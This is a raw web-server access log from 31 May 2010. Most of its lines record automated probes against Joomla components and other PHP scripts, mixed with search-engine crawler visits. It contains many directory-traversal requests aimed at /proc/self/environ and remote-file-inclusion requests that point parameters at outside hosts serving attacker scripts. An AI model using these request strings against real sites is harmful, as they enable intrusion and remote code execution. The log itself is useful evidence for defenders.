121.78.118.123 - - [31/May/2010:05:01:56 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
200.43.180.250 - - [31/May/2010:05:03:44 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:05:03:51 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
85.153.27.146 - - [31/May/2010:05:04:17 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
85.153.27.146 - - [31/May/2010:05:04:17 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
85.153.27.146 - - [31/May/2010:05:04:17 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
85.153.27.146 - - [31/May/2010:05:04:24 -0500] "GET /logs/access_log.1273363200/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.195.112.180 - - [31/May/2010:05:05:00 -0500] "GET /logs/access_log.1162944000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.60.53.122 - - [31/May/2010:05:05:12 -0500] "GET /logs/access_log.1270512000//components/com_facileforms/facileforms.frame.php?ff_compath=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
65.60.53.122 - - [31/May/2010:05:05:12 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 338 "-""Mozilla/5.0"
65.60.53.122 - - [31/May/2010:05:05:12 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.60.53.122 - - [31/May/2010:05:05:12 -0500] "GET /logs/access_log.1271721600//components/com_facileforms/facileforms.frame.php?ff_compath=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 360 "-""Mozilla/5.0"
187.45.193.159 - - [31/May/2010:05:07:18 -0500] "GET /logs/index2.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
187.45.193.159 - - [31/May/2010:05:07:19 -0500] "GET /index2.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.43.180.250 - - [31/May/2010:05:08:33 -0500] "GET /logs/access_log.1273363200/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:05:08:33 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
200.43.180.250 - - [31/May/2010:05:08:34 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
74.55.65.134 - - [31/May/2010:05:08:35 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:08:36 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:08:42 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
208.115.111.248 - - [31/May/2010:05:08:53 -0500] "GET /logs/access_log.1247529600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:08:55 -0500] "GET /logs/access_log.1247616000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:08:57 -0500] "GET /logs/access_log.1247702400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:08:59 -0500] "GET /logs/access_log.1247875200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:09:01 -0500] "GET /logs/access_log.1248393600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:09:04 -0500] "GET /logs/access_log.1248480000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:09:06 -0500] "GET /logs/access_log.1248566400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:09:09 -0500] "GET /logs/access_log.1248652800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:09:11 -0500] "GET /logs/access_log.1248825600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [31/May/2010:05:09:14 -0500] "GET /logs/access_log.1248912000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.228.226.12 - - [31/May/2010:05:09:38 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
67.228.226.12 - - [31/May/2010:05:09:39 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
67.228.226.12 - - [31/May/2010:05:09:39 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
67.228.226.12 - - [31/May/2010:05:10:58 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
121.78.118.123 - - [31/May/2010:05:11:46 -0500] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.78.118.123 - - [31/May/2010:05:11:46 -0500] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.78.118.123 - - [31/May/2010:05:11:46 -0500] "GET /logs/access_log.1263081600//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
121.78.118.123 - - [31/May/2010:05:11:47 -0500] "GET //components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 331 "-""Mozilla/5.0"
121.78.118.123 - - [31/May/2010:05:11:47 -0500] "GET /logs//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 336 "-""Mozilla/5.0"
121.78.118.123 - - [31/May/2010:05:11:48 -0500] "GET /logs/access_log.1263081600//components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 358 "-""Mozilla/5.0"
187.45.193.159 - - [31/May/2010:05:12:50 -0500] "GET /logs/index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
187.45.193.159 - - [31/May/2010:05:12:50 -0500] "GET /index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
130.237.199.243 - - [31/May/2010:05:13:53 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_design""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; sv-se) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
130.237.199.243 - - [31/May/2010:05:13:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; sv-se) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7"
67.195.112.180 - - [31/May/2010:05:14:02 -0500] "GET /logs/access_log.1193097600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.13.140 - - [31/May/2010:05:15:56 -0500] "GET /logs/access_log.1179100800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [31/May/2010:05:16:22 -0500] "GET /costume/costume1.htm HTTP/1.0" 304 - "http://www.webring.com/hub?ring=history&id=1163&prvw""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.28.102.242 - - [31/May/2010:05:18:02 -0500] "GET /logs/access_log.1270857600//?_PHPLIB[libdir]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.28.102.242 - - [31/May/2010:05:18:02 -0500] "GET /logs/access_log.1272412800//?_PHPLIB[libdir]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.28.102.242 - - [31/May/2010:05:18:02 -0500] "GET //?_PHPLIB[libdir]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
62.28.102.242 - - [31/May/2010:05:18:02 -0500] "GET /logs//?_PHPLIB[libdir]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 7675 "-""Mozilla/5.0"
87.250.255.243 - - [31/May/2010:05:20:17 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
58.180.42.218 - - [31/May/2010:05:20:46 -0500] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
58.180.42.218 - - [31/May/2010:05:20:46 -0500] "GET /logs/access_log.1270771200//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
58.180.42.218 - - [31/May/2010:05:20:46 -0500] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
174.121.176.85 - - [31/May/2010:05:20:50 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
174.121.176.85 - - [31/May/2010:05:20:50 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.121.176.85 - - [31/May/2010:05:20:50 -0500] "GET /logs/access_log.1271548800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
58.180.42.218 - - [31/May/2010:05:20:55 -0500] "GET /logs/access_log.1272412800//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
58.180.42.218 - - [31/May/2010:05:21:10 -0500] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 349 "-""Mozilla/5.0"
58.180.42.218 - - [31/May/2010:05:21:10 -0500] "GET /logs/access_log.1270771200//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
58.180.42.218 - - [31/May/2010:05:21:10 -0500] "GET //administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 344 "-""Mozilla/5.0"
58.180.42.218 - - [31/May/2010:05:21:21 -0500] "GET /logs/access_log.1272412800//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 371 "-""Mozilla/5.0"
174.121.176.85 - - [31/May/2010:05:21:23 -0500] "GET /logs/access_log.1271548800//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 370 "-""Mozilla/5.0"
174.121.176.85 - - [31/May/2010:05:21:23 -0500] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 348 "-""Mozilla/5.0"
174.121.176.85 - - [31/May/2010:05:21:23 -0500] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://motoreizen.com/cache/id1.txt???? HTTP/1.1" 404 343 "-""Mozilla/5.0"
67.195.112.180 - - [31/May/2010:05:22:22 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.52 - - [31/May/2010:05:25:56 -0500] "GET /logs/access_log.1217635200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [31/May/2010:05:28:34 -0500] "GET /logs/access_log.1235347200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.108.177.125 - - [31/May/2010:05:30:09 -0500] "GET //index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:05:30:10 -0500] "GET /logs//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:05:30:10 -0500] "GET /logs/access_log.1273363200//index.php?option=com_fabrik&view=http://www.premiumriviera.com/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.201.191 - - [31/May/2010:05:30:28 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:05:30:28 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.201.191 - - [31/May/2010:05:30:28 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
209.44.120.3 - - [31/May/2010:05:30:38 -0500] "GET //bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.44.120.3 - - [31/May/2010:05:30:38 -0500] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.44.120.3 - - [31/May/2010:05:30:38 -0500] "GET /logs/access_log.1271548800//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/data/yoonseok/id1.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
192.167.114.31 - - [31/May/2010:05:31:50 -0500] "GET /logs/alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.820"
192.167.114.31 - - [31/May/2010:05:31:51 -0500] "GET /alpha.php?Absolute_Path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.820"
89.110.147.156 - - [31/May/2010:05:32:45 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
89.110.147.156 - - [31/May/2010:05:32:45 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
76.12.58.212 - - [31/May/2010:05:34:20 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
76.12.58.212 - - [31/May/2010:05:34:20 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:05:34:38 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [31/May/2010:05:34:38 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
211.174.62.150 - - [31/May/2010:05:34:46 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
211.174.62.150 - - [31/May/2010:05:34:46 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
211.174.62.150 - - [31/May/2010:05:34:46 -0500] "GET /logs/access_log.1271894400//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.174.62.150 - - [31/May/2010:05:34:59 -0500] "GET /logs/access_log.1271808000//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
74.55.65.134 - - [31/May/2010:05:35:35 -0500] "GET /logs/access_log.1274313600//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:35:35 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:35:35 -0500] "GET /logs//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
91.211.114.164 - - [31/May/2010:05:35:40 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
91.211.114.164 - - [31/May/2010:05:35:40 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
94.102.1.206 - - [31/May/2010:05:35:49 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
94.102.1.206 - - [31/May/2010:05:35:50 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
66.90.73.48 - - [31/May/2010:05:39:05 -0500] "GET /index1.php?option=com_myblog&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
114.108.177.125 - - [31/May/2010:05:39:16 -0500] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:05:39:16 -0500] "GET //include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:05:39:17 -0500] "GET /logs/access_log.1271894400//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
114.108.177.125 - - [31/May/2010:05:39:38 -0500] "GET /logs/access_log.1271808000//include/print_category.php?setup[use_category]=1&dir=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
209.44.120.3 - - [31/May/2010:05:39:40 -0500] "GET /logs/*/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:39:40 -0500] "GET /logs/*/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:39:41 -0500] "GET /*/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
209.44.120.3 - - [31/May/2010:05:39:41 -0500] "GET /*/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
74.55.65.134 - - [31/May/2010:05:43:28 -0500] "GET /logs/access_log.1273622400//index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [31/May/2010:05:43:28 -0500] "GET //index.php?option=com_myblog&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
